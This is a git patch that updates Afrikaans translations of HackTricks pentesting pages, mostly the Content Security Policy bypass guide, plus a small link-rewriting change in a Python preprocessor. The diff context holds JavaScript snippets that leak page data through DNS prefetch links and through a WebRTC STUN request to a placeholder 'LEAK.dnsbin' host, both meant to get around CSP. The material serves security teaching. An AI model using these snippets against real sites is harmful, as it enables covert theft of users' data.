From 4198d57fd40e30eedc85d14746462113793f8d6a Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 27 Jan 2025 16:55:52 +0000 Subject: [PATCH] Translated ['src/generic-methodologies-and-resources/external-recon-meth --- hacktricks-preprocessor.py | 3 + .../wide-source-code-search.md | 4 +- .../README.md | 98 +++++++++---------- 3 files changed, 54 insertions(+), 51 deletions(-) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index af5949449..5d070c39f 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -78,6 +78,9 @@ def ref(matchobj): sys.exit(1) + if href.endswith("/README.md"): + href = href.replace("/README.md", "/index.html") + template = f"""{title}""" # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"}) diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index ced8d9153..bd719c65a 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,4 +1,4 @@ -# Wye Bronkode Soektog +# Wye Bronnkode Soektog {{#include ../../banners/hacktricks-training.md}} @@ -14,6 +14,6 @@ Dit help in verskeie gevalle om **gelekte inligting** of **kwesbaarhede** patron - [**SearchCode**](https://searchcode.com/): Soek kode in miljoene projekte. > [!WARNING] -> Wanneer jy soek na lekkasies in 'n repo en iets soos `git log -p` uitvoer, moenie vergeet dat daar dalk **ander takke met ander verbintenisse** is wat geheime bevat nie! +> Wanneer jy soek na lekkasies in 'n repo en iets soos `git log -p` uitvoer, moenie vergeet daar mag **ander takke met ander verbintenisse** wees wat geheime bevat nie! {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index 0abd25cb2..73638d334 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -8,7 +8,7 @@ Content Security Policy (CSP) word erken as 'n blaastegnologie, hoofsaaklik gemi Implementering van CSP word uitgevoer deur **antwoordkoppe** of deur **meta-elemente in die HTML-bladsy** in te sluit. Na hierdie beleid, handhaaf blaaiers proaktief hierdie bepalings en blokkeer onmiddellik enige opgespoor oortredings. -- Implemented via response header: +- Geïmplementeer via antwoordkop: ``` Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self'; ``` @@ -53,7 +53,7 @@ object-src 'none'; - **base-uri**: Spesifiseer toegelate URL's vir laai met behulp van `` elemente. - **form-action**: Lys geldige eindpunte vir vormindienings. - **plugin-types**: Beperk mime-tipes wat 'n bladsy mag aanroep. -- **upgrade-insecure-requests**: Gee opdrag aan blaaiers om HTTP-URL's na HTTPS te herskryf. +- **upgrade-insecure-requests**: Gee instruksies aan blaaiers om HTTP-URL's na HTTPS te herskryf. - **sandbox**: Pas beperkings toe wat soortgelyk is aan die sandbox-attribuut van 'n ` ``` -In [**hierdie CTF skrywe**](https://github.com/aszx87410/ctf-writeups/issues/48), was dit moontlik om via **HTML inspuiting** 'n **CSP** meer te **beperk** sodat 'n skrip wat CSTI voorkom, gedeaktiveer is en daarom het die **kwesbaarheid uitvoerbaar geword.**\ +In [**hierdie CTF skrywe**](https://github.com/aszx87410/ctf-writeups/issues/48), was dit moontlik via **HTML inspuiting** om 'n **CSP** meer te **beperk** sodat 'n skrip wat CSTI voorkom, gedeaktiveer is en daarom het die **kwesbaarheid uitvoerbaar geword.**\ CSP kan meer beperkend gemaak word deur **HTML meta-tags** te gebruik en inline skripte kan gedeaktiveer word deur die **invoer** wat hul **nonce** toelaat te **verwyder** en **spesifieke inline skrip via sha** te aktiveer: ```html ` Jy kan hierdie gedrag misbruik om **sensitiewe inligting via DNS versoeke te exfiltreer**: @@ -669,18 +669,18 @@ linkEl.rel = "prefetch" linkEl.href = urlWithYourPreciousData document.head.appendChild(linkEl) ``` -Om te verhoed dat dit gebeur, kan die bediener die HTTP-kopstuk stuur: +Om te verhoed dat dit gebeur, kan die bediener die HTTP-kop stuur: ``` X-DNS-Prefetch-Control: off ``` > [!NOTE] -> Blykbaar werk hierdie tegniek nie in headless blaaiers (bots) nie +> Blykbaar werk hierdie tegniek nie in koplose blaaiers (bots) nie ### WebRTC Op verskeie bladsye kan jy lees dat **WebRTC nie die `connect-src` beleid** van die CSP nagaan nie. -Werklik kan jy _leak_ inligting gebruik makend van 'n _DNS versoek_. Kyk na hierdie kode: +Werklik kan jy _leak_ inligting gebruik maak van 'n _DNS versoek_. Kyk na hierdie kode: ```javascript ;(async () => { p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })